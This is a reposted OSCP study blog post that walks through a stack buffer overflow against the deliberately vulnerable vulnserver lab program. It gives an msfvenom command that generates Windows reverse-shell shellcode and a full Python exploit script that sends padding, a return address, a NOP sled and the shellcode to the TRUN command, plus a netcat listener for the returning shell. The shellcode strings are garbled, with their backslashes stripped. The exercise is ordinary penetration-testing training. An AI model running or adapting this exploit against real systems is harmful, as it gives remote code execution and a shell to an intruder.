zoukankan      html  css  js  c++  java

  • OSCP Security Technology

    OSCP Security Technology - Generating Shellcode& Gaining Root

    Generating shellcode.(Note: LHOST is Kali Linux's IP)

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "x00"

    image-20210627202658912

    "xdaxcdxd9x74x24xf4xbfx1exa7x4bx98x5ax2bxc9xb1"
"x52x31x7ax17x83xc2x04x03x64xb4xa9x6dx64x52xaf"
"x8ex94xa3xd0x07x71x92xd0x7cxf2x85xe0xf7x56x2a"
"x8ax5ax42xb9xfex72x65x0axb4xa4x48x8bxe5x95xcb"
"x0fxf4xc9x2bx31x37x1cx2ax76x2axedx7ex2fx20x40"
"x6ex44x7cx59x05x16x90xd9xfaxefx93xc8xadx64xca"
"xcax4cxa8x66x43x56xadx43x1dxedx05x3fx9cx27x54"
"xc0x33x06x58x33x4dx4fx5fxacx38xb9xa3x51x3bx7e"
"xd9x8dxcex64x79x45x68x40x7bx8axefx03x77x67x7b"
"x4bx94x76xa8xe0xa0xf3x4fx26x21x47x74xe2x69x13"
"x15xb3xd7xf2x2axa3xb7xabx8exa8x5axbfxa2xf3x32"
"x0cx8fx0bxc3x1ax98x78xf1x85x32x16xb9x4ex9dxe1"
"xbex64x59x7dx41x87x9ax54x86xd3xcaxcex2fx5cx81"
"x0excfx89x06x5ex7fx62xe7x0ex3fxd2x8fx44xb0x0d"
"xafx67x1ax26x5ax92xcdx89x33x9ex15x62x46x9ex34"
"x2excfx78x5cxdex99xd3xc9x47x80xafx68x87x1exca"
"xabx03xadx2bx65xe4xd8x3fx12x04x97x1dxb5x1bx0d"
"x09x59x89xcaxc9x14xb2x44x9ex71x04x9dx4ax6cx3f"
"x37x68x6dxd9x70x28xaax1ax7exb1x3fx26xa4xa1xf9"
"xa7xe0x95x55xfexbex43x10xa8x70x3dxcax07xdbxa9"
"x8bx6bxdcxafx93xa1xaax4fx25x1cxebx70x8axc8xfb"
"x09xf6x68x03xc0xb2x89xe6xc0xcex21xbfx81x72x2c"
"x40x7cxb0x49xc3x74x49xaexdbxfdx4cxeax5bxeex3c"
"x63x0ex10x92x84x1b"

    Write the exploit script.

    nano exploit.py
chmod 777 exploit.py

    #!/usr/bin/python
import socket
import sys

exploit = (
"xdaxcdxd9x74x24xf4xbfx1exa7x4bx98x5ax2bxc9xb1"
"x52x31x7ax17x83xc2x04x03x64xb4xa9x6dx64x52xaf"
"x8ex94xa3xd0x07x71x92xd0x7cxf2x85xe0xf7x56x2a"
"x8ax5ax42xb9xfex72x65x0axb4xa4x48x8bxe5x95xcb"
"x0fxf4xc9x2bx31x37x1cx2ax76x2axedx7ex2fx20x40"
"x6ex44x7cx59x05x16x90xd9xfaxefx93xc8xadx64xca"
"xcax4cxa8x66x43x56xadx43x1dxedx05x3fx9cx27x54"
"xc0x33x06x58x33x4dx4fx5fxacx38xb9xa3x51x3bx7e"
"xd9x8dxcex64x79x45x68x40x7bx8axefx03x77x67x7b"
"x4bx94x76xa8xe0xa0xf3x4fx26x21x47x74xe2x69x13"
"x15xb3xd7xf2x2axa3xb7xabx8exa8x5axbfxa2xf3x32"
"x0cx8fx0bxc3x1ax98x78xf1x85x32x16xb9x4ex9dxe1"
"xbex64x59x7dx41x87x9ax54x86xd3xcaxcex2fx5cx81"
"x0excfx89x06x5ex7fx62xe7x0ex3fxd2x8fx44xb0x0d"
"xafx67x1ax26x5ax92xcdx89x33x9ex15x62x46x9ex34"
"x2excfx78x5cxdex99xd3xc9x47x80xafx68x87x1exca"
"xabx03xadx2bx65xe4xd8x3fx12x04x97x1dxb5x1bx0d"
"x09x59x89xcaxc9x14xb2x44x9ex71x04x9dx4ax6cx3f"
"x37x68x6dxd9x70x28xaax1ax7exb1x3fx26xa4xa1xf9"
"xa7xe0x95x55xfexbex43x10xa8x70x3dxcax07xdbxa9"
"x8bx6bxdcxafx93xa1xaax4fx25x1cxebx70x8axc8xfb"
"x09xf6x68x03xc0xb2x89xe6xc0xcex21xbfx81x72x2c"
"x40x7cxb0x49xc3x74x49xaexdbxfdx4cxeax5bxeex3c"
"x63x0ex10x92x84x1b")

shellcode = "A" * 2003 + "xafx11x50x62" + "x90" * 32 + exploit

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect=s.connect(('192.168.2.21',9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger" 
s.close()

    Run the vulnserver and then run the exploit script.

    nc - nvlp 4444

./exploit.py

    image-20210627200903029

    image-20210627202757022

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    深入浅出之正则表达式(一)
    Windows平台下构建 Android 开发环境( Android SDK 下载及安装教程)
    Eclipse 安装配置总结
    JDK安装配置教程
    关于磁力链接(Magnet URI)的简单介绍
    C# ASP.NET里的@妙用,字符串换行
    颜色中英文对照表 CSS
    使用git 工具下载android.jar Source Code
    ASP.NET表单提交之Get和Post的区别
    深入浅出之正则表达式(二)
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/14942003.html
Copyright © 2011-2022 走看看